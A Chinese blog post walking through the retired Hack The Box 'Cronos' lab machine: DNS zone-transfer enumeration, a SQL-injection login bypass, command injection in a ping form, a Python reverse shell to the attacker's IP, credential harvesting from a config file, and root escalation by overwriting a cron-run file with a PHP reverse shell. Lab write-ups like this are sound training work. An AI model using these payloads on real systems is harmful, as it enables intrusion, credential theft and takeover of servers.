<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="描述"><title>退役的Medium难度，就这？—— Cronos靶机 | 高小调博客</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/latest/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/latest/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/latest/grids-responsive-min.min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/latest/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="//lib.baomitu.com/clipboard.js/latest/clipboard.min.js"></script><script type="text/javascript" src="//lib.baomitu.com/toastr.js/latest/toastr.min.js"></script><link rel="stylesheet" href="//lib.baomitu.com/toastr.js/latest/toastr.min.css"><meta name="generator" content="Hexo 8.1.1"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">退役的Medium难度，就这？—— Cronos靶机</h1><a id="logo" href="/.">高小调博客</a><p class="description">人生，不止代码</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/about-me/"><i class="fa fa-user"> 关于</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">退役的Medium难度，就这？—— Cronos靶机</h1><div class="post-meta">2022-10-06</div><div class="post-content"><p><img src="/images/image-1664983561912.png" alt="file" /> 这台靶机，主要考察了对DNS服务的枚举，表面上难度是Medium，实际我个人感受是Easy难度，与之前打的<a href="http://gaoxiaodiao.com/penetration-and-practice/htb-trick/">Trick</a>的靶机恰好相反，废话不多说，开打，开打。</p>
<h2 id="1枚举靶机端口开放情况"><a class="markdownIt-Anchor" href="#1枚举靶机端口开放情况"></a> 1.枚举靶机端口开放情况</h2>
<p>这台机器共开放了三个端口：22、53和80。 <img src="/images/image-1664976849531.png" alt="file" /></p>
<h2 id="2枚举http服务-ip当问"><a class="markdownIt-Anchor" href="#2枚举http服务-ip当问"></a> 2.枚举HTTP服务 - ip当问</h2>
<p>柿子专挑软的捏，我们可以直接访问这台靶机的80端口：<a target="_blank" rel="noopener" href="http://10.10.10.13/">http://10.10.10.13/</a>，得到的是一个Apache2的默认配置页面。 <img src="/images/image-1664977595397.png" alt="file" /></p>
<p>出于谨慎，防止老六，我还是做了一下目录爆破，果然… <img src="/images/image-1664978087983.png" alt="file" /> 啥也没有！（这一波啊，我在第五层，而作者在第一层）</p>
<h2 id="3枚举dns服务-nslookup"><a class="markdownIt-Anchor" href="#3枚举dns服务-nslookup"></a> 3.枚举DNS服务 - nslookup</h2>
<p>已知：当前靶机开放了53端口，而通过ip访问HTTP服务，却啥信息也没得到。</p>
<p>猜测：当前靶机的Apache开启了虚拟主机的功能，需要进一步枚举其绑定的域名。</p>
<p>所以，我们使用<code>nslookup</code>工具，设置DNS服务器的地址为10.10.10.13，需要查询10.10.10.13绑定的域名，最终命令如下： <img src="/images/image-1664978217492.png" alt="file" /></p>
<p>我们就成功得到了<code>ns1.cronos.htb</code>的子域名，由此也能得到<code>cronos.htb</code>这个二级域名。</p>
<h2 id="4枚举dns服务-axfr"><a class="markdownIt-Anchor" href="#4枚举dns服务-axfr"></a> 4.枚举DNS服务 - axfr</h2>
<p>接下来，我们对<code>cronos.htb</code>做进一步枚举，看看还有没有存在其它子域名。</p>
<p>在这里我们可以使用dig工具来做区域传输(Zone Transfer)的查询：<code>dig axfr @&lt;server_ip&gt; &lt;domain&gt;</code> <img src="/images/image-1664978962441.png" alt="file" /></p>
<p>从中，我们又获得了一个<code>admin.cronos.htb</code>的子域名。</p>
<h2 id="5枚举http服务-cronoshtb"><a class="markdownIt-Anchor" href="#5枚举http服务-cronoshtb"></a> 5.枚举HTTP服务 - cronos.htb</h2>
<p>主页纯静态页面，没啥内容，没有攻击面。 <img src="/images/image-1664980104716.png" alt="file" /> 目录爆破，也没爆破出啥内容，所以，只能PASS。 <img src="/images/image-1664980023650.png" alt="file" /></p>
<h2 id="6枚举http服务-admincronoshtb"><a class="markdownIt-Anchor" href="#6枚举http服务-admincronoshtb"></a> 6.枚举HTTP服务 - admin.cronos.htb</h2>
<p>这个子域名里，直接给一个登录界面。</p>
<p><img src="/images/image-1664980525298.png" alt="file" /></p>
<p>说实话，我最讨厌看到这种带登录界面的情况，这种情况，要么很简单，随便一个弱密码就能过，要么就比较恶心，会浪费大量的时间在这上面。</p>
<p>还好，本靶机给一个万能密码就能过：</p>
<ul>
<li>用户名：<code>admin' or 1 = 1 #</code></li>
<li>密码：<code>&lt;任意字符&gt;</code></li>
</ul>
<p>登录成功后，映入眼帘的是一个管理页面： <img src="/images/image-1664980558045.png" alt="file" /></p>
<p>从UI中可以看到，我们可以执行<code>ping</code>或者<code>traceroute</code>命令。</p>
<p>接下来，打开浏览器的开发者工具，对其进行抓包，复制出CURL命令的payload： <img src="/images/image-1664980956140.png" alt="file" /></p>
<p>精简后，命令如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &#x27;http://admin.cronos.htb/welcome.php&#x27; -H &#x27;Cookie: PHPSESSID=9b49vuklfqicj3o2fujb39btj5&#x27; --data-raw &#x27;command=traceroute&amp;host=8.8.8.8&#x27;</span><br></pre></td></tr></table></figure>
<h2 id="7对welcomephp进行利用"><a class="markdownIt-Anchor" href="#7对welcomephp进行利用"></a> 7.对welcome.php进行利用</h2>
<p>从上述精简后的命令，我们在对<code>welcome.php</code>进行POST请求时，它支持两个参数<code>command</code>和<code>host</code>。</p>
<p>如果服务端没有对<code>command</code>参数做过滤，那就有可能造成远程任意代码执行(RCE)的漏洞。</p>
<p>那，接下来，我们就尝试一下： <img src="/images/image-1664981422477.png" alt="file" /></p>
<p>从上图的结果来看，这台靶机果然存在RCE漏洞的，那接下来我们可以去<a target="_blank" rel="noopener" href="https://www.revshells.com">Reverse Shell Generator</a>网站，拿到一段python3的反弹shell的payload，最终完整的请求如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &#x27;http://admin.cronos.htb/welcome.php&#x27; -H &#x27;Cookie: PHPSESSID=9b49vuklfqicj3o2fujb39btj5&#x27; --data-raw &#x27;command=python3 -c &quot;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\&quot;10.10.16.10\&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\&quot;sh\&quot;)&quot;&#x27;</span><br></pre></td></tr></table></figure>
<p>打开新的Terminal，监听4444端口，当上述命令执行完毕后，成功拿到shell！ <img src="/images/image-1664981640567.png" alt="file" /></p>
<h2 id="8横向移动"><a class="markdownIt-Anchor" href="#8横向移动"></a> 8.横向移动</h2>
<p>接下来，通过<code>www-data</code>用户，在网站目录里收集各种凭据(credential):</p>
<p>从配置文件中，拿到mysql数据库名和密码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># /var/www/admin/config.php</span><br><span class="line">&lt;?php</span><br><span class="line">   define(&#x27;DB_SERVER&#x27;, &#x27;localhost&#x27;);</span><br><span class="line">   define(&#x27;DB_USERNAME&#x27;, &#x27;admin&#x27;);</span><br><span class="line">   define(&#x27;DB_PASSWORD&#x27;, &#x27;kEjdbRigfBHUREiNSDs&#x27;);</span><br><span class="line">   define(&#x27;DB_DATABASE&#x27;, &#x27;admin&#x27;);</span><br><span class="line">   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>从数据库中，拿到<code>admin / 4f5fffa7b2340178a716e3832451e058</code>。</p>
<p>从/etc/passwd中，获得<code>noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash</code></p>
<p>但这些都没什么卵用，没办法帮我横向移动到<code>noulis</code>用户。</p>
<h2 id="9定时任务提权"><a class="markdownIt-Anchor" href="#9定时任务提权"></a> 9.定时任务提权</h2>
<p>正当我陷入困境时，突然一拍脑袋，这台靶机名字有点像cron，是不是存在一个定时任务，可以让我提权？？？</p>
<p><img src="/images/image-1664982870612.png" alt="file" /></p>
<p>果不其然，<code>/var/www/laravel/artisan</code>这个文件会以root权限的方式被周期性调用。</p>
<p>既然如此，我就可以写一个php的反弹shell来替换artisan文件的内容：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;&lt;?php $sock=fsockopen(&quot;10.10.16.10&quot;,4445);system(&quot;sh &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;); ?&gt;&#x27; &gt; /var/www/laravel/artisan</span><br></pre></td></tr></table></figure>
<p>最后，稍等片刻，等待shell回弹… <img src="/images/image-1664983393472.png" alt="file" /></p>
<p>提权完成！</p>
</div><div class="tags"><a href="/tags/htb"><i class="fa fa-tag">htb</i></a></div><div class="post-nav"><a class="pre" href="/p/htb-nibbles/">被靶机密码Gank的一次渗透—— Nibbles靶机</a><a class="next" href="/p/htb-bashed/">记一次轻松+愉快的渗透测试——Bashed靶机</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="author-info"><a class="info-avatar" href="/about-me/" title="关于"><img class="nofancybox" src="/img/avatar.png"/></a><p>stay hungry, stay foolish</p><a class="info-icon" href="https://twitter.com/gaoxiaodiao" title="Twitter" target="_blank" style="margin-inline:5px"> <i class="fa fa-twitter-square" style="margin-inline:5px"></i></a><a class="info-icon" href="mailto:admin@domain.com" title="Email" target="_blank" style="margin-inline:5px"> <i class="fa fa-envelope-square" style="margin-inline:5px"></i></a><a class="info-icon" href="https://github.com/gaoxiaodiao" title="Github" target="_blank" style="margin-inline:5px"> <i class="fa fa-github-square" style="margin-inline:5px"></i></a><a class="info-icon" href="/atom.xml" title="RSS" target="_blank" style="margin-inline:5px"> <i class="fa fa-rss-square" style="margin-inline:5px"></i></a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/linux%E5%BC%80%E5%8F%91/" style="font-size: 15px;">linux开发</a> <a href="/tags/mac%E5%BC%80%E5%8F%91/" style="font-size: 15px;">mac开发</a> <a href="/tags/%E5%B7%A5%E6%AC%B2%E5%96%84%E5%85%B6%E4%BA%8B-%E5%BF%85%E5%85%88%E5%88%A9%E5%85%B6%E5%99%A8/" style="font-size: 15px;">工欲善其事,必先利其器</a> <a href="/tags/%E9%80%86%E5%90%91-%E7%A0%B4%E8%A7%A3/" style="font-size: 15px;">逆向&破解</a> <a href="/tags/%E7%AC%AC%E4%B8%89%E6%96%B9%E5%BA%93%E7%BC%96%E8%AF%91/" style="font-size: 15px;">第三方库编译</a> <a href="/tags/%E5%BC%80%E5%8F%91-%E4%BB%A3%E7%A0%81/" style="font-size: 15px;">开发&代码</a> <a href="/tags/%E7%AC%94%E8%AE%B0/" style="font-size: 15px;">笔记</a> <a href="/tags/%E5%A4%AA%E7%9B%91/" style="font-size: 15px;">太监</a> <a href="/tags/%E6%95%85%E9%9A%9C%E6%8E%92%E9%99%A4-%E4%BF%AE%E5%A4%8D/" style="font-size: 15px;">故障排除/修复</a> <a href="/tags/%E5%BF%83%E8%B7%AF%E5%8E%86%E7%A8%8B/" style="font-size: 15px;">心路历程</a> <a href="/tags/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" style="font-size: 15px;">奇技淫巧</a> <a href="/tags/%E5%89%AF%E4%B8%9A%E6%8E%A2%E7%B4%A2/" style="font-size: 15px;">副业探索</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/ChatGPT%E6%97%A0%E6%B3%95%E5%81%9A%E5%88%B0%E7%9A%84%E4%BA%8B%E6%83%85/" style="font-size: 15px;">ChatGPT无法做到的事情</a> <a href="/tags/Foundry/" style="font-size: 15px;">Foundry</a> <a href="/tags/%E5%8E%9F%E5%A7%8B%E7%9F%A5%E8%AF%86%E7%A7%AF%E7%B4%AF/" style="font-size: 15px;">原始知识积累</a> <a href="/tags/PowerShell/" style="font-size: 15px;">PowerShell</a> <a href="/tags/htb/" style="font-size: 15px;">htb</a> <a href="/tags/%E6%9E%B6%E6%9E%84%E5%B8%88%E4%B9%8B%E8%B7%AF/" style="font-size: 15px;">架构师之路</a> <a href="/tags/%E5%85%85%E7%94%B5%E4%BC%9A%E5%91%98%E4%B8%93%E5%B1%9E/" style="font-size: 15px;">充电会员专属</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/p/maximize-chatgpt-plus-pro-membership-value/">如何最大化程度榨干ChatGPT的20/200刀会员?</a></li><li class="post-list-item"><a class="post-list-link" href="/p/02_ghostvm-architecture-iteration-2/">GhostVM架构设计迭代记录(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/p/01_ghostvm-architecture-iteration-1/">GhostVM架构设计迭代记录(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/p/lady-luck-is-smiling-2/">幸运女神在微笑（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/p/lady-luck-is-smiling-1/">幸运女神在微笑（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/p/the-third-wave-reading-notes-6/">读书与思考之《第三次浪潮》第六章</a></li><li class="post-list-item"><a class="post-list-link" href="/p/the-third-wave-reading-notes-5/">读书与思考之《第三次浪潮》第五章</a></li><li class="post-list-item"><a class="post-list-link" href="/p/how-to-modify-registry-by-powershell/">如何通过PowerShell来创建、读取、修改、删除注册表？</a></li><li class="post-list-item"><a class="post-list-link" href="/p/the-third-wave-reading-notes-3_4/">读书与思考之《第三次浪潮》第三、四章</a></li><li class="post-list-item"><a class="post-list-link" href="/p/investment-cryptocurrency-diary-1/">加密货币投资日记（一）：序言</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://gaoxiaodiao.com/" title="高小调博客" target="_blank">高小调博客</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2026 <a href="/." rel="nofollow">高小调博客.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/latest/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0"></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/latest/jquery.fancybox.min.css"><script type="text/javascript" src="/js/love.js?v=1.0.0"></script><script type="text/javascript" src="/js/copycode.js?v=1.0.0" successtext="复制成功！"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=1.0.0"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>